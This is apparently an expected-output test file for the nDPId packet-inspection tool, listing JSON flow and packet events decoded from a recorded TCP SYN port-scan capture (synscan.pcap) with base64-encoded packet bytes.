-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAADgGngysEAAIQA2GNIzSH0vdUoMYAAAAAGACBAAVRAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs2lMAADQGOh+sEAAIQA2GNIzSAaHdUoMYAAAAAGACBAAy7gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpQAAC8GUt6sEAAIQA2GNIzSgAPdUoMYAAAAAGACEACoiwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeAAACgGDpOsEAAIQA2GNIzSF3HdUoMYAAAAAGACBAAdHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsuFoAAC8GYRisEAAIQA2GNIzSBd\/dUoMYAAAAAGACEAAisAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/1UAACcGIh2sEAAIQA2GNIzSBDTdUoMYAAAAAGACEAAkWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7oAADYGhrisEAAIQA2GNIzSD6LdUoMYAAAAAGACDAAc7QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAswXcAACgGXvusEAAIQA2GNIzSADHdUoMYAAAAAGACBAA0XgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAAC4Gn7esEAAIQA2GNIzSCD\/dUoMYAAAAAGACDAAkUAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xUAADoGK12sEAAIQA2GNIzSAQjdUoMYAAAAAGACDAArhwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs0AcAADMGRWusEAAIQA2GNIzSBdzdUoMYAAAAAGACEAAiswAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jUAACkGQT2sEAAIQA2GNIzSwAndUoMYAAAAAGACCABwhQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4bMAACsGO7+sEAAIQA2GNIzSBDndUoMYAAAAAGACEAAkVgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0gAADYGSyqsEAAIQA2GNIzSCcTdUoMYAAAAAGACDAAiywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsMJQAADkG3t6sEAAIQA2GNIzSGafdUoMYAAAAAGACCAAW6AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsmh8AADkGdVOsEAAIQA2GNIzSBAndUoMYAAAAAGACCAAshgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsyJIAAC0GUuCsEAAIQA2GNIzSAnfdUoMYAAAAAGACCAAuGAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsRs4AAC8G0qSsEAAIQA2GNIzSAojdUoMYAAAAAGACEAAmBwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYAYAAC0Gu2ysEAAIQA2GNIzSB9LdUoMYAAAAAGACCAAovQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ0cAACsGtiusEAAIQA2GNIzSAVTdUoMYAAAAAGACEAAnOwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsgsYAADsGiqysEAAIQA2GNIzSHQvdUoMYAAAAAGACEAALhAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsnEMAACsGgS+sEAAIQA2GNIzSGojdUoMYAAAAAGACEAAOBwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYIUAAC0Guu2sEAAIQA2GNIzSAw\/dUoMYAAAAAGACCAAtgAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAs5r4AAC4GM7SsEAAIQA2GNIzSBHvdUoMYAAAAAGACDAAoFAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060701,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 